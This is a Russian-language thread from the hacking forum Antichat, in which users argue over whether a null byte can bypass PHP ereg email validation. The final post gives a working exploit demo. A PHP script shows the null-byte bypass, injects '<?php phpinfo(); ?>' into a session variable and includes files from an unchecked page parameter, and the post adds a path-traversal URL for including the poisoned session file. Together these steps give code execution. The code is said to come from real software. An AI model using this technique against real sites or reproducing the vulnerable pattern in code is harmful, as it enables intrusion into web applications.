Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.05.2009, 20:37
|
|
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923
Репутация:
65
|
|
PaCo приведи пример. Твои слова обсолюто ни чем не аргументированны. Я поискал и замети то что отписал выше. Покажеш где это работает я признаю что ты прав.
|
|
|
23.05.2009, 20:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Квест, раз уж ты все понимаешь, то советую еще больше расширить свои кругозор,
во-первых прочти статью Электа про обход фильтрации ereg null-байтом (это про %00),
во-вторых ты пишешь про тему сообщения, а в заметке говорится о адресе, прочти документацию еще раз и узри что там адреса получателей заносятся через запятую, т.о. Если первым значением до занятой будет валидныи адрес, а после запятой наш зловредный кулхакерский код, то все прекрасно выполнится!
П.с. Не обижайся, я раньше тоже таким был, сейчас приучили сначала читать, потом спорить.
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
23.05.2009, 20:43
|
|
Новичок
Регистрация: 21.05.2009
Сообщений: 11
Провел на форуме:
59923
Репутация:
65
|
|
Twoster я всеголиш пытаюсь разобратся вышеописанное я читал и матерьял действительно проверен и усвоен.Обижатся ненашто тк все ошибки это не минус - это опыт.Ну рас ни кто не готов показать, поиду искать дальше.В любом случае спасибо за совет.
Последний раз редактировалось _Quest_; 23.05.2009 в 20:46..
|
|
|
|
23.05.2009, 20:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
ок, я сейчас с телефона, в понедельник накатаю тебе скрипт, наглядным примером.
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
23.05.2009, 21:23
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
попадёшь в роа, увидишь там реальный пример мной написаный
воланд пришет про ereg-подобные функции которые уязвимы к нулбайту
Если ты не нашёл ничего подобного в нескольких цмс - это не значит что такого не бывает
|
|
|
|
23.05.2009, 21:57
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Вот тебе РАБОЧИЙ пример:
PHP код:
<?php
session_start();
$_POSTT['mail']= "mail@mail.ru" . chr(00) . '<?php phpinfo(); ?>' ;//что бы не писать форму
// Взято с реального двига - advanced poll - include/class_pollcomment.php - 295 стр.
if (!eregi("^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@([0-9a-z][0-9a-z-]*[0-9a-z]\\.)+[0-9a-z]{1,6}$", $_POSTT['mail']) ) {
$_POSTT['mail'] = '';
}
//echo $_POSTT['mail'];
$to = $_POSTT['mail'];
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
if(mail($to, $subject, $message, $headers)){//
$_SESSION['mail']=$_POSTT['mail'];;
}
//LFI тоже взято с одного самопального движка
$page=@file_exists($_GET['page']) ? $_GET['page'] : '';
if(!empty($page)){
include($page);
}
Далее смотришь в кукисах(в адресной строке) свой индентификатор сессии(если ты такой знаток как пишешь то разберешься что это), далее чистишь кукисы или заходишь с другова браузера(важно что бы твой идентификатор сессии не передовался иначе инклюд не выйдет, по крайне мере у меня из за этого не выходил нигде где бы я ни пробывал, может это связано с тем php производит запись в файл сессии и и инклюд не происходит):
имя_скрипта.php?page=/../../../../../../../TMP/sess_тут_индетификатор_сесси _из_кукисов_или_из_адресной _строки
Последний раз редактировалось PaCo; 24.05.2009 в 21:59..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
